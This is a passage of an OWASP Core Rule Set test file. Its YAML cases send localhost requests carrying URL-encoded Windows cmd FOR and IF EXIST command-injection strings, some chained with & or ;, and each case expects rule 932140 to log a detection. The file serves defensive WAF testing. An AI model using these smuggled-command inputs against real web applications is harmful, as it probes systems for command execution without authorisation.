"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FD+++++++++++%25a+IN+%28dirs%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 13 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FD+%2FD++++++++%25a+IN+%28dirs%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 14 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28text%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 15 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28%22text%22%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 16 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+++++++++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 17 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+%2FL+%2FL+++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 18 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FR+C%3A%5Cbla++++%25A+IN+%28set%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 19 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+for+%25a+in+%28a%2Cb%2Cc%29+do+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 20 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%25a+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 21 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25_+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 22 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%252+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 23 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25-+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 24 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%2F+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 25 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%40+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 26 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%5B+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 27 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%5D+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 28 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%7E+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 29 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25A+IN+%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 30 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25%25A+IN+++%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 31 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+%28%27SET%27%29+DO+%40Echo+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 32 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 33 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25%7E+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 34 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25G%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 35 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25%25G%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 36 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25G%22%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 37 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25%25G%22%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 38 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25A+%25B+%25D" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 39 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25%25A+%25%25B+%25%25D" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 40 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25G%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 41 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25%25G%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 42 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+%25G+IN+%281%2C1%2C5%29+DO+echo+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 43 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+%25%25G+IN+%281%2C1%2C5%29+DO+echo+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 44 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 45 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 46 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 47 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 48 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FD+%2Fr+%25G+in+%28%22User%2A%22%29+DO+Echo+We+found+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 49 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C3+delims%3D%2C%22+%25%25G+IN+%28weather.txt%29+DO+%40echo+%25%25G+%25%25H" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 50 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D4+delims%3D%2C%22+%25%25G+IN+%28%22deposit%2C%244500%2C123.4%2C12-AUG-09%22%29+DO+%40echo+Date+paid+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 51 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 52 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%25%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 53 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 54 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 55 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 56 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25%25G" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 57 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+for+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2863%2B21%29%5C%22%27%29+do+%40set+%2Fp+%3D+PDVQIS%25iPDVQISPDVQIS%3C+nul" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 58 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%3Bfor+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2835%2B66%29%5C%22%27%29+do+%40set+%2Fp+%3D+LZEUZE%25iLZEUZELZEUZE%3C+nul%27" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 59 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Ff+%22tokens%3D%2A+delims%3D0%22+%25%25A+in+%28%22%25n1%25%22%29+do+set+%22n1%3D%25%25A%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 60 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D+%25i" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 61 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D%21LIST%21+%25i" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 62 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Fl+%25%25I+in+%280%2C1%2C5%29+do+call+echo+%25%25RANDOM%25%25" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 63 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25%25d+in+%28A%2CC%2CD%29+do+DIR+%25%25d+%2A.%2A" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 64 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25%25f+in+%28%2A.TXT+%2A.BAT+%2A.DOC%29+do+TYPE+%25%25f" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 65 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25%25P+in+%28%25PATH%25%29+do+if+exist+%25%25P%5C%2A.BAT+COPY+%25%25P%5C%2A.BAT+C%3A%5CBAT" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 66 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+filename.txt+++++%28" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 67 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+filename+++++++++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 68 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+filename+++++++++%28CMD%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 69 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+data.xls+++++++++Echo+The+file+was+found." + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 70 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+MyFile.txt+++++++%28ECHO+Some%5Bmore%5DPotatoes%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 71 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 72 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++%28CMD%29+ELSE+%28CMD%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 73 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 74 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+NOT+EXIST+C%3A%5Cnonexistent+++echo+hey" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 75 + desc: imported test + stages: + - input: + dest_addr: 